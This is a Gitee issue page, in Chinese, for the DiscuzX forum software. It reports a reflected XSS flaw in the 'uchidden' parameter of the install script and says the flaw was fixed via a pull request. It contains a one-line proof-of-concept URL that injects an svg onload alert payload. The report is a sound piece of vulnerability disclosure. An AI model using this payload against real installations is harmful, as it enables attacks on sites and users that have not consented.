880 Star 3.6K Fork 1.5K

Discuz / DiscuzX

 / 详情

安装时候有个参数存在XSS漏洞,反馈下,

已完成
创建于  
2018-10-16 11:02

POC :

http://www.28.com/dz/install/index.php?step=1&uchidden=a%22%3E%3Csvg/onload=alert(1022)%3E&submit=%E6%88%91%E5%90%8C%E6%84%8F

输入图片说明

评论 (0)

ning1022 创建了任务
老周部落 通过Discuz/DiscuzX Pull Request !187任务状态待办的 修改为已完成
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
389160 ning1022 1578922334
PHP
1
https://gitee.com/Discuz/DiscuzX.git
git@gitee.com:Discuz/DiscuzX.git
Discuz
DiscuzX
DiscuzX

搜索帮助